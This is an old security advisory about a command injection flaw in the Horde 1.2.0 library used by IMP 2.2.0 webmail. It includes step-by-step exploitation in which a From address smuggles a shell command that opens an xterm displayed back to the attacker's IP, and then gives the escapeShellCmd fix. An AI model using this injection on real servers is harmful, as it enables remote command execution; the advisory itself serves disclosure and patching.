|
Vulnerability IMP Affected IMP 2.2.0 Description Christian Winter found following. This is intended as a paper for sysadmins who want to secure their systems. It is NOT a how to for scriptkiddies to run any attack on a IMP-using site. The authors of this text will not be held responsible for any damage resulting from others using the documented exploits for attacking or invading 3rd parties' computers or networks. Bug found and exploited by Jens "atomi" Steube. Fixed and documentated by Christian "thepoet" Winter. The bug was found in the horde library code of Horde 1.2.0. Other versions haven't been checked yet. If you are in doubt that your version is also buggy, please contact the horde authors as described on http://horde.org. The $from-bug is in the horde library file 'horde.lib', (on debian systems installed in /usr/share/horde/lib/horde.lib) in line 1108 belonging to function "mailfrom". In this file there is a call to "popen" with an unchecked "from:"-line as argument. Exact syntax is: $mail = popen("$default->path_to_sendmail -i -f$from --$recipients", 'w'); If the user passes a string containing the "&" char to the function as $from, commands can be executed under the uid and gid the webserver is running as. Usually the horde.lib/mailfrom function is called by the IMP webmail interface. As IMP also does not check for the "&" char, it is passed on to popen(). There are also some other software-projects using the hordelib - they also could be exploited by the same means. 1) Just open an IMP and press Compose to write a new mail 2) As your From-EMail Adress an exploit $from-line could be: &"/usr/X11R6/bin/xterm -display 127.0.0.1:0.0"& (Remember most people should replace 127.0.0.1 with their own IP and also verify the path to xterm) or any other command you want. 3) enter a recipient 4) Send message, done. Solution The horde library already provides a function that prevents this kind of exploits, called "escapeShellCmd". It is used with the "$recipients" var but not with "$from". To secure the installed horde it is sufficient to add the following line 1108 in /usr/share/horde/lib/horde.lib: $from = escapeShellCmd( $from ); or download a patch form: http://ssl.coc-ag.de/sec/hordelib-1.2.0.frombug.patch The included fix has been applied to the CVS code for both the Horde 1.2 branch and the Horde 1.3 branch (development). Horde 1.2.1 and IMP 2.2.1 will have this fixed. In addition to this fix, the new releases will also include a number of small bug fixes and improvements. For Debian: http://security.debian.org/dists/stable/updates/main/source/horde_1.2.1-0.dsc http://security.debian.org/dists/stable/updates/main/source/horde_1.2.1-0.tar.gz http://security.debian.org/dists/stable/updates/main/source/imp_2.2.1-0.dsc http://security.debian.org/dists/stable/updates/main/source/imp_2.2.1-0.tar.gz http://security.debian.org/dists/stable/updates/main/binary-all/horde_1.2.1-0_all.deb http://security.debian.org/dists/stable/updates/main/binary-all/imp_2.2.1-0_all.deb